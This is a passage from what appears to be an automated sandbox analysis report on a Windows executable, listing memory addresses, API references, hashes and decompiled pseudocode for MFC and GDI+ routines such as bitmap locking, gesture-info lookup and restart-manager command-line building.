      0x00a39c5c
      0x00a39c62
      0x00a39c67
      0x00a39c6d
      0x00000000
      0x00a39b2f
      0x00a39b32
      0x00a39b39
      0x00a39b40
      0x00a39b49
      0x00a39b55
      0x00a39b56
      0x00a39b57
      0x00a39b59
      0x00a39b5f
      0x00a39b60
      0x00a39b63
      0x00a39b68
      0x00a39b6a
      0x00a39b71
      0x00a39b71
      0x00a39b6c
      0x00a39b6c
      0x00a39b6c
      0x00a39b73
      0x00a39b75
      0x00a39bb2
      0x00a39bb9
      0x00a39bbf
      0x00a39bc2
      0x00a39bc6
      0x00a39bcc
      0x00a39bce
      0x00a39bd7
      0x00a39be2
      0x00a39be8
      0x00a39beb
      0x00a39bee
      0x00a39bfa
      0x00a39bfa
      0x00a39bce
      0x00a39bff
      0x00a39c05
      0x00a39c0b
      0x00a39c0c
      0x00a39c0f
      0x00a39c14
      0x00a39c16
      0x00a39c18
      0x00a39c18
      0x00a39c72
      0x00a39c72
      0x00a39c79
      0x00a39c7b
      0x00a39c81
      0x00a39c84
      0x00a39c8a
      0x00a39c90
      0x00a39c90
      0x00a39c7b
      0x00a39c94
      0x00a39c94
      0x00a39b77
      0x00a39b77
      0x00a39b7e
      0x00a39b84
      0x00a39b8a
      0x00a39b8d
      0x00a39b93
      0x00a39b99
      0x00a39b99
      0x00a39b9d
      0x00000000
      0x00a39b7e
      0x00a39b75
      0x00a399f8
      0x00a399ff
      0x00a39a01
      0x00a39a07
      0x00a39a0d
      0x00a39a25
      0x00a39a31
      0x00a39a0f
      0x00a39a0f
      0x00a39a16
      0x00a39a18
      0x00000000
      0x00a39a1a
      0x00a39a1c
      0x00a39a21
      0x00a39a21
      0x00a39a18
      0x00a39a33
      0x00a39a35
      0x00a39a6b
      0x00a39a70
      0x00a39a73
      0x00a39a75
      0x00a39a7e
      0x00a39a7e
      0x00a39a85
      0x00a39a8b
      0x00a39a91
      0x00a39a94
      0x00a39a9a
      0x00a39aa0
      0x00a39aa0
      0x00a39aa4
      0x00000000
      0x00000000
      0x00a39a77
      0x00a39a77
      0x00a39a7c
      0x00a39aa9
      0x00a39ab0
      0x00a39ab2
      0x00a39ab4
      0x00a39ab7
      0x00a39abd
      0x00a39ac3
      0x00a39ac5
      0x00a39acb
      0x00a39ad7
      0x00a39ae0
      0x00a39ae3
      0x00a39ae9
      0x00a39af0
      0x00a39af7
      0x00a39b05
      0x00a39b05
      0x00a39abd
      0x00a39b18
      0x00a39b1d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00a39a7c
      0x00a39a37
      0x00a39a37
      0x00a39a3d
      0x00a39a3f
      0x00a39a45
      0x00a39a48
      0x00a39a4e
      0x00a39a54
      0x00a39a54
      0x00a39a3f
      0x00a39a58
      0x00a39a58
      0x00a39a58
      0x00a39a35
      0x00a399db
      0x00a399db
      0x00a399db
      0x00a399db
      0x00a39c9c
      0x00a39c9d
      0x00a39c9e
      0x00a39caa
      0x00000000

      APIs
        • Part of subcall function 00A36C70: GdipGetImagePixelFormat.GDIPLUS(?,00D11EB4,00000000,00000000,?,00A39945,00000000,00000000,00D11EB4), ref: 00A36C80
      • _free.LIBCMT ref: 00A39A4E
      • _free.LIBCMT ref: 00A39A9A
      • GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00D11EB4), ref: 00A39B63
      • _free.LIBCMT ref: 00A39B93
        • Part of subcall function 00A36C92: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00A399FF,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00A36CA6
      • GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00D11EB4), ref: 00A39C0F
      • _free.LIBCMT ref: 00A39C8A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
      • String ID: &
      • API String ID: 4092590016-3042966939
      • Opcode ID: 81ada92db07ef5977336d4110ed7eba9bfb48050df4decb4d4aa32ead4af4a68
      • Instruction ID: a5a41e2d1179a65c0d7a889b98a20de2a1f78d706e411e48e17e1a176d5c822f
      • Opcode Fuzzy Hash: 81ada92db07ef5977336d4110ed7eba9bfb48050df4decb4d4aa32ead4af4a68
      • Instruction Fuzzy Hash: 83A15CB19002289BDB21DF14CD81BDAB7B5EF84314F1085E9F649A7251CB749EC5CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009ACD40 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 191libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 55%
      			E009ACD40(intOrPtr __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
				struct HINSTANCE__* _t81;
				void* _t82;
				intOrPtr _t88;
				intOrPtr _t92;
				void* _t95;
				signed int _t96;
				intOrPtr _t99;
				signed int _t103;
				struct HINSTANCE__* _t109;
				void* _t115;
				void* _t119;
				void* _t122;
				void* _t125;
				void* _t127;
				intOrPtr _t128;
				void* _t130;
				struct HWND__* _t135;
				signed int _t136;
				signed int _t141;
				intOrPtr* _t146;
				void* _t147;
				void* _t148;
				long long* _t149;
				signed long long _t173;

				_t173 = __fp0;
				_t111 = __ecx;
				_t110 = __ebx;
				_push(0x18);
				E00AAD232(0xac7ffa, __ebx, __edi, __esi);
				_t146 = __ecx;
				_t152 =  *0xd0fb60 & 0x00000001;
				if(( *0xd0fb60 & 0x00000001) == 0) {
					 *0xd0fb60 =  *0xd0fb60 | 0x00000001;
					 *(_t147 - 4) =  *(_t147 - 4) & 0x00000000;
					_push("user32.dll");
					_t109 = E009AB6E5(__ecx, __ecx, _t152);
					 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
					_pop(_t111);
					 *0xd0fb5c = _t109;
				}
				_t81 =  *0xd0fb5c; // 0x0
				if(_t81 == 0) {
					_t81 = E009B8782(_t111);
				}
				_t141 = GetProcAddress;
				if(( *0xd0fb60 & 0x00000002) == 0) {
					 *0xd0fb60 =  *0xd0fb60 | 0x00000002;
					 *0xd0fb58 = GetProcAddress(_t81, "GetGestureInfo");
				}
				if(( *0xd0fb60 & 0x00000004) == 0) {
					 *0xd0fb60 =  *0xd0fb60 | 0x00000004;
					 *0xd0fb54 = GetProcAddress( *0xd0fb5c, "CloseGestureInfoHandle");
				}
				if( *0xd0fb58 == 0 ||  *0xd0fb54 == 0) {
					L34:
					_t82 = E009AC865(_t110, _t146, _t141, __eflags);
					goto L35;
				} else {
					_t141 = 0;
					_t110 = 0x30;
					_t161 =  *((intOrPtr*)(_t146 + 0x50));
					if( *((intOrPtr*)(_t146 + 0x50)) == 0) {
						 *((intOrPtr*)(_t146 + 0x50)) = E009A6291(_t161, _t110);
					}
					E00AAB3F0( *((intOrPtr*)(_t146 + 0x50)), _t141, _t110);
					_t149 = _t148 + 0xc;
					 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x50)))) = _t110;
					_push( *((intOrPtr*)(_t146 + 0x50)));
					_push( *((intOrPtr*)(_t147 + 0xc)));
					if( *0xd0fb58() == 0) {
						L32:
						_push(_t110);
						_push(_t141);
						_push( *((intOrPtr*)(_t146 + 0x50)));
						goto L33;
					} else {
						_t135 =  *(_t146 + 0x20);
						_t88 =  *((intOrPtr*)(_t146 + 0x50));
						if( *((intOrPtr*)(_t88 + 0xc)) != _t135) {
							goto L32;
						}
						 *(_t147 - 0x14) =  *((short*)(_t88 + 0x10));
						 *(_t147 - 0x10) =  *((short*)(_t88 + 0x12));
						ScreenToClient(_t135, _t147 - 0x14);
						_t92 =  *((intOrPtr*)(_t146 + 0x50));
						_t141 = 1;
						_t115 =  *((intOrPtr*)(_t92 + 8)) - 1;
						if(_t115 == 0) {
							 *(_t146 + 0x3c) =  *(_t147 - 0x14);
							 *(_t146 + 0x40) =  *(_t147 - 0x10);
							 *((intOrPtr*)(_t146 + 0x44)) =  *((intOrPtr*)(_t92 + 0x20));
							 *(_t146 + 0x48) =  *(_t92 + 0x24);
							goto L34;
						}
						_t119 = _t115 - 1;
						if(_t119 == 0) {
							_t136 = _t135 | 0xffffffff;
							 *(_t146 + 0x3c) = _t136;
							_push(_t110);
							_push(0);
							 *(_t146 + 0x40) = _t136;
							 *((intOrPtr*)(_t146 + 0x44)) = 0;
							 *(_t146 + 0x48) = 0;
							_push(_t92);
							L33:
							E00AAB3F0();
							goto L34;
						}
						_t122 = _t119 - 1;
						if(_t122 == 0) {
							_t95 =  *((intOrPtr*)(_t92 + 0x20)) -  *((intOrPtr*)(_t146 + 0x44));
							__eflags = _t95;
							_t96 =  *((intOrPtr*)( *_t146 + 0x134))( *(_t147 - 0x14),  *(_t147 - 0x10), _t95);
							L26:
							asm("sbb edi, edi");
							_t141 =  ~_t96 + 1;
							if(_t141 == 0) {
								 *0xd0fb54( *((intOrPtr*)(_t147 + 0xc)));
							}
							L28:
							 *(_t146 + 0x3c) =  *(_t147 - 0x14);
							 *(_t146 + 0x40) =  *(_t147 - 0x10);
							_t99 =  *((intOrPtr*)(_t146 + 0x50));
							 *((intOrPtr*)(_t146 + 0x44)) =  *((intOrPtr*)(_t99 + 0x20));
							 *(_t146 + 0x48) =  *(_t99 + 0x24);
							if(_t141 != 0) {
								goto L34;
							}
							_t82 = 0;
							L35:
							return E00AAD30A(_t82);
						}
						_t125 = _t122 - 1;
						if(_t125 == 0) {
							_t96 =  *((intOrPtr*)( *_t146 + 0x138))( *(_t146 + 0x3c),  *(_t146 + 0x40),  *(_t147 - 0x14),  *(_t147 - 0x10));
							goto L26;
						}
						_t127 = _t125 - 1;
						if(_t127 == 0) {
							_t128 =  *((intOrPtr*)(_t92 + 0x20));
							_t103 =  *(_t92 + 0x24);
							 *(_t147 - 0x1c) =  *(_t147 - 0x1c) & 0x00000000;
							 *(_t147 - 0x18) = _t103;
							 *(_t147 - 0x18) =  *(_t147 - 0x18) & 0x80000000;
							 *((intOrPtr*)(_t147 - 0x24)) = _t128;
							 *(_t147 - 0x20) = _t103 & 0x7fffffff;
							asm("fild qword [ebp-0x24]");
							asm("fild qword [ebp-0x1c]");
							asm("fchs");
							asm("faddp st1, st0");
							 *_t149 = _t173 /  *0xad8878 *  *0xad8870 *  *0xad8868 -  *0xad8860;
							_t96 =  *((intOrPtr*)( *_t146 + 0x13c))( *(_t147 - 0x14),  *(_t147 - 0x10), _t128, _t128);
							goto L26;
						}
						_t130 = _t127 - 1;
						if(_t130 == 0) {
							_t96 =  *((intOrPtr*)( *_t146 + 0x140))( *(_t147 - 0x14),  *(_t147 - 0x10));
							goto L26;
						}
						if(_t130 != 1) {
							goto L28;
						}
						_t96 =  *((intOrPtr*)( *_t146 + 0x144))( *(_t147 - 0x14),  *(_t147 - 0x10),  *((intOrPtr*)(_t92 + 0x20)));
						goto L26;
					}
				}
			}



























      0x009acd40
      0x009acd40
      0x009acd40
      0x009acd40
      0x009acd47
      0x009acd4c
      0x009acd4e
      0x009acd55
      0x009acd57
      0x009acd5e
      0x009acd62
      0x009acd67
      0x009acd6c
      0x009acd70
      0x009acd71
      0x009acd71
      0x009acd76
      0x009acd7d
      0x009acd7f
      0x009acd7f
      0x009acd8b
      0x009acd91
      0x009acd93
      0x009acda2
      0x009acda2
      0x009acdae
      0x009acdb0
      0x009acdc4
      0x009acdc4
      0x009acdd0
      0x009acfa1
      0x009acfa3
      0x00000000
      0x009acde3
      0x009acde3
      0x009acde7
      0x009acde8
      0x009acdeb
      0x009acdf4
      0x009acdf4
      0x009acdfc
      0x009ace04
      0x009ace07
      0x009ace09
      0x009ace0c
      0x009ace17
      0x009acf94
      0x009acf94
      0x009acf95
      0x009acf96
      0x00000000
      0x009ace1d
      0x009ace1d
      0x009ace20
      0x009ace26
      0x00000000
      0x00000000
      0x009ace34
      0x009ace3c
      0x009ace3f
      0x009ace45
      0x009ace4d
      0x009ace4e
      0x009ace4f
      0x009acf7d
      0x009acf83
      0x009acf89
      0x009acf8f
      0x00000000
      0x009acf8f
      0x009ace55
      0x009ace56
      0x009acf62
      0x009acf67
      0x009acf6c
      0x009acf6d
      0x009acf6e
      0x009acf71
      0x009acf74
      0x009acf77
      0x009acf99
      0x009acf99
      0x00000000
      0x009acf9e
      0x009ace5c
      0x009ace5d
      0x009acf17
      0x009acf17
      0x009acf25
      0x009acf2b
      0x009acf2f
      0x009acf31
      0x009acf34
      0x009acf39
      0x009acf39
      0x009acf3f
      0x009acf42
      0x009acf48
      0x009acf4b
      0x009acf51
      0x009acf57
      0x009acf5c
      0x00000000
      0x00000000
      0x009acf5e
      0x009acfa8
      0x009acfad
      0x009acfad
      0x009ace63
      0x009ace64
      0x009acf0c
      0x00000000
      0x009acf0c
      0x009ace6a
      0x009ace6b
      0x009acea4
      0x009acea7
      0x009aceaa
      0x009aceae
      0x009aceb1
      0x009acebd
      0x009acec0
      0x009acec3
      0x009acec8
      0x009acecf
      0x009aced1
      0x009aceeb
      0x009acef4
      0x00000000
      0x009acef4
      0x009ace6d
      0x009ace6e
      0x009ace99
      0x00000000
      0x009ace99
      0x009ace71
      0x00000000
      0x00000000
      0x009ace84
      0x00000000
      0x009ace84
      0x009ace17

      APIs
      • __EH_prolog3.LIBCMT ref: 009ACD47
      • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 009ACDA0
      • GetProcAddress.KERNEL32(CloseGestureInfoHandle,00000018), ref: 009ACDC2
      • _memset.LIBCMT ref: 009ACDFC
      • ScreenToClient.USER32 ref: 009ACE3F
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$ActivateClientH_prolog3Screen_memset
      • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
      • API String ID: 4039673286-2905070798
      • Opcode ID: cc2818ce99f750155920da25501efb77faf662fe2105e31b5a3cc15502e92a45
      • Instruction ID: 5949c30da9717d4cac2d39aabdde9ac23bfff1ed16fdb71ea8d489bf3a7a5e53
      • Opcode Fuzzy Hash: cc2818ce99f750155920da25501efb77faf662fe2105e31b5a3cc15502e92a45
      • Instruction Fuzzy Hash: 1871CFB0900705DFCB28DF65D954A6ABBF6FF49300B21496DE45A9B7A0CB35AC40CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A9DBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92COMMON
      Download Yara Rule
      C-Code - Quality: 81%
      			E009A9DBC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				void* _t74;
				void* _t79;

				_t72 = __edx;
				_push(0x28);
				E00AAD29B(0xac7eec, __ebx, __edi, __esi);
				_t60 =  *((intOrPtr*)(_t79 + 8));
				_t74 = __ecx;
				E009A5D70(_t79 - 0x34, __edx, E009B9D52());
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				if((E009B0A7A(__ecx) & 0x00004000) == 0) {
					_t34 =  *((intOrPtr*)(__ecx + 0xe4));
					_t64 = _t79 - 0x34;
					E009A909D(_t79 - 0x34, __edx,  *((intOrPtr*)(__ecx + 0xe4)),  *((intOrPtr*)(_t34 - 0xc)));
					if(_t60 != 0) {
						E009A909D(_t79 - 0x34, _t72, 0xad8318, E00AAD550(0xad8318));
						_t64 = _t79 - 0x34;
						E009A938A(_t79 - 0x34, _t60);
						_t42 =  *((intOrPtr*)(_t74 + 0x78));
						if(_t42 > 0) {
							swprintf(_t79 - 0x30, 0x20, ":%d", _t42);
							_push(E00AAD550(_t79 - 0x30));
							_t47 = _t79 - 0x30;
							goto L9;
						}
					}
				} else {
					if(_t60 != 0) {
						E009A938A(_t79 - 0x34, _t60);
						_t50 =  *((intOrPtr*)(_t74 + 0x78));
						if(_t50 > 0) {
							swprintf(_t79 - 0x30, 0x20, ":%d", _t50);
							E009A909D(_t79 - 0x34, _t72, _t79 - 0x30, E00AAD550(_t79 - 0x30));
						}
						E009A909D(_t79 - 0x34, _t72, 0xad8318, E00AAD550(0xad8318));
					}
					_t47 =  *((intOrPtr*)(_t74 + 0xe4));
					_push( *((intOrPtr*)(_t47 - 0xc)));
					L9:
					_push(_t47);
					_t64 = _t79 - 0x34;
					E009A909D(_t79 - 0x34, _t72);
				}
				_t76 =  *((intOrPtr*)(_t79 - 0x34));
				E009BB926(_t64, _t72,  *((intOrPtr*)(_t74 + 0x20)),  *((intOrPtr*)(_t79 - 0x34)));
				E009A5510(_t76 - 0x10, _t72);
				return E00AAD31E(_t60, _t74, _t76);
			}









      0x009a9dbc
      0x009a9dbc
      0x009a9dc3
      0x009a9dc8
      0x009a9dcb
      0x009a9dd6
      0x009a9ddb
      0x009a9deb
      0x009a9e4c
      0x009a9e55
      0x009a9e59
      0x009a9e60
      0x009a9e73
      0x009a9e79
      0x009a9e7c
      0x009a9e81
      0x009a9e86
      0x009a9e94
      0x009a9ea5
      0x009a9ea6
      0x00000000
      0x009a9ea6
      0x009a9e86
      0x009a9ded
      0x009a9def
      0x009a9df5
      0x009a9dfa
      0x009a9dff
      0x009a9e0d
      0x009a9e26
      0x009a9e26
      0x009a9e3c
      0x009a9e3c
      0x009a9e41
      0x009a9e47
      0x009a9ea9
      0x009a9ea9
      0x009a9eaa
      0x009a9ead
      0x009a9ead
      0x009a9eb2
      0x009a9eb9
      0x009a9ec1
      0x009a9ecb

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009A9DC3
        • Part of subcall function 009B0A7A: GetWindowLongA.USER32 ref: 009B0A85
      • swprintf.LIBCMT ref: 009A9E0D
      • _strlen.LIBCMT ref: 009A9E16
        • Part of subcall function 009A909D: _strnlen.LIBCMT ref: 009A90CF
        • Part of subcall function 009A909D: _memcpy_s.LIBCMT ref: 009A9103
      • _strlen.LIBCMT ref: 009A9E31
      • _strlen.LIBCMT ref: 009A9E68
      • swprintf.LIBCMT ref: 009A9E94
      • _strlen.LIBCMT ref: 009A9E9D
        • Part of subcall function 009A938A: _strlen.LIBCMT ref: 009A939C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _strlen$swprintf$H_prolog3_LongWindow_memcpy_s_strnlen
      • String ID: - $:%d
      • API String ID: 3048052868-2359489159
      • Opcode ID: 37734f0ba2d8228739d7de25822a8f14f700024b13ef52a1d0a76d79f6196116
      • Instruction ID: cccc1cc19c8ce7a696906a27b912ee037c9efa868c0521abd876b108f034fb09
      • Opcode Fuzzy Hash: 37734f0ba2d8228739d7de25822a8f14f700024b13ef52a1d0a76d79f6196116
      • Instruction Fuzzy Hash: 5D312F729011157BDB05FBA4DE86FEEB7ADBF52300F144829B506A7192EF61AE04C7E0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B289C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 182COMMON
      Download Yara Rule
      C-Code - Quality: 54%
      			E009B289C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t73;
				intOrPtr* _t83;
				intOrPtr* _t84;
				void* _t87;
				intOrPtr* _t93;
				intOrPtr* _t122;
				intOrPtr _t159;
				intOrPtr _t165;
				intOrPtr _t167;
				void* _t170;

				_t157 = __edx;
				_push(0x28);
				E00AAD29B(0xac82b2, __ebx, __edi, __esi);
				_t122 = __ecx;
				E009A5D70(_t170 - 0x24, __edx, E009B9D52());
				_t159 = 0;
				 *((intOrPtr*)(_t170 - 4)) = 0;
				E009A5D70(_t170 - 0x28, __edx, E009B9D52());
				 *((char*)(_t170 - 4)) = 1;
				_t73 = E009A6C6C( *((intOrPtr*)( *((intOrPtr*)(_t170 + 0xc)))) - 0x10) + 0x10;
				 *((intOrPtr*)(_t170 - 0x30)) = _t73;
				 *((char*)(_t170 - 4)) = 2;
				if( *((intOrPtr*)(_t73 - 0xc)) == 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__imp__CoCreateGuid(_t170 - 0x20);
					E009A5D70(_t170 - 0x2c, _t157, E009B9D52());
					_push( *(_t170 - 0x11) & 0x000000ff);
					_push( *(_t170 - 0x12) & 0x000000ff);
					_push( *(_t170 - 0x13) & 0x000000ff);
					_push( *(_t170 - 0x14) & 0x000000ff);
					_push( *(_t170 - 0x15) & 0x000000ff);
					_push( *(_t170 - 0x16) & 0x000000ff);
					_push( *(_t170 - 0x17) & 0x000000ff);
					_push( *(_t170 - 0x18) & 0x000000ff);
					_push( *(_t170 - 0x1a) & 0x0000ffff);
					_push( *(_t170 - 0x1c) & 0x0000ffff);
					 *((char*)(_t170 - 4)) = 3;
					E009A911D(_t170 - 0x30, "%08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X",  *((intOrPtr*)(_t170 - 0x20)));
					 *((char*)(_t170 - 4)) = 2;
					E009A5510( *((intOrPtr*)(_t170 - 0x2c)) + 0xfffffff0, _t157);
					_t159 = 0;
				}
				E009A6000(_t157, _t159,  *((intOrPtr*)(_t122 + 0x48)));
				E009A909D(_t170 - 0x28, _t157, "RestartByRestartManager", E00AAD550("RestartByRestartManager"));
				E009A909D(_t170 - 0x28, _t157, ":", E00AAD550(":"));
				E009A909D(_t170 - 0x28, _t157,  *((intOrPtr*)(_t170 - 0x30)),  *((intOrPtr*)( *((intOrPtr*)(_t170 - 0x30)) - 0xc)));
				if(E009B20AE(_t170 - 0x24,  *((intOrPtr*)(_t170 - 0x28)), _t159) == 0xffffffff) {
					E009A909D(_t170 - 0x24, _t157, " /", E00AAD550(" /"));
					E009A909D(_t170 - 0x24, _t157,  *((intOrPtr*)(_t170 - 0x28)),  *((intOrPtr*)( *((intOrPtr*)(_t170 - 0x28)) - 0xc)));
				}
				_t83 =  *((intOrPtr*)( *_t122 + 0xfc))();
				if(_t83 != _t159) {
					_t157 =  *_t83;
					 *((intOrPtr*)( *_t83 + 0x24))(_t170 - 0x30);
				}
				_push( *((intOrPtr*)(_t170 - 0x24)));
				if( *((intOrPtr*)(_t170 + 8)) == _t159) {
					_t84 = E009B2018(_t122, _t170 - 0x2c, _t157, _t159);
					_t165 =  *_t122;
					 *((char*)(_t170 - 4)) = 5;
					 *((intOrPtr*)(_t170 - 0x34)) =  *_t84;
					_t87 =  *((intOrPtr*)(_t165 + 0xcc))( *((intOrPtr*)(_t170 - 0x34)),  *((intOrPtr*)(_t165 + 0xf0))(_t159, _t159, _t159, _t159));
					_push( *((intOrPtr*)(_t170 - 0x2c)));
				} else {
					_t93 = E009B2018(_t122, _t170 - 0x34, _t157, _t159);
					_t167 =  *_t122;
					 *((char*)(_t170 - 4)) = 4;
					 *((intOrPtr*)(_t170 - 0x2c)) =  *_t93;
					_t87 =  *((intOrPtr*)(_t167 + 0xcc))( *((intOrPtr*)(_t170 - 0x2c)),  *((intOrPtr*)( *_t122 + 0xf0))(E009B1ED2,  *((intOrPtr*)( *_t122 + 0xf4))( *((intOrPtr*)(_t167 + 0xf8))(_t159))));
					_push( *((intOrPtr*)(_t170 - 0x34)));
				}
				__imp__#6();
				E009A5510( *((intOrPtr*)(_t170 - 0x30)) + 0xfffffff0, _t157);
				E009A5510( *((intOrPtr*)(_t170 - 0x28)) + 0xfffffff0, _t157);
				E009A5510( *((intOrPtr*)(_t170 - 0x24)) + 0xfffffff0, _t157);
				return E00AAD31E(_t122, _t159, _t87);
			}













      0x009b289c
      0x009b289c
      0x009b28a3
      0x009b28ab
      0x009b28b6
      0x009b28bb
      0x009b28bd
      0x009b28c9
      0x009b28d4
      0x009b28dd
      0x009b28e1
      0x009b28e4
      0x009b28eb
      0x009b28f5
      0x009b28f6
      0x009b28f7
      0x009b28fc
      0x009b28fd
      0x009b290c
      0x009b2915
      0x009b291a
      0x009b291f
      0x009b2924
      0x009b2929
      0x009b292e
      0x009b2933
      0x009b2938
      0x009b293d
      0x009b2942
      0x009b294f
      0x009b2953
      0x009b2961
      0x009b2965
      0x009b296a
      0x009b296a
      0x009b2972
      0x009b2988
      0x009b299e
      0x009b29ad
      0x009b29c1
      0x009b29d4
      0x009b29e3
      0x009b29e3
      0x009b29ec
      0x009b29f4
      0x009b29f6
      0x009b29fe
      0x009b29fe
      0x009b2a01
      0x009b2a07
      0x009b2a54
      0x009b2a5b
      0x009b2a63
      0x009b2a67
      0x009b2a76
      0x009b2a7c
      0x009b2a09
      0x009b2a0c
      0x009b2a13
      0x009b2a18
      0x009b2a1c
      0x009b2a46
      0x009b2a4c
      0x009b2a4c
      0x009b2a81
      0x009b2a8d
      0x009b2a98
      0x009b2aa3
      0x009b2aaf

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _strlen$CreateFreeGuidH_prolog3_String
      • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
      • API String ID: 1721273623-5890034
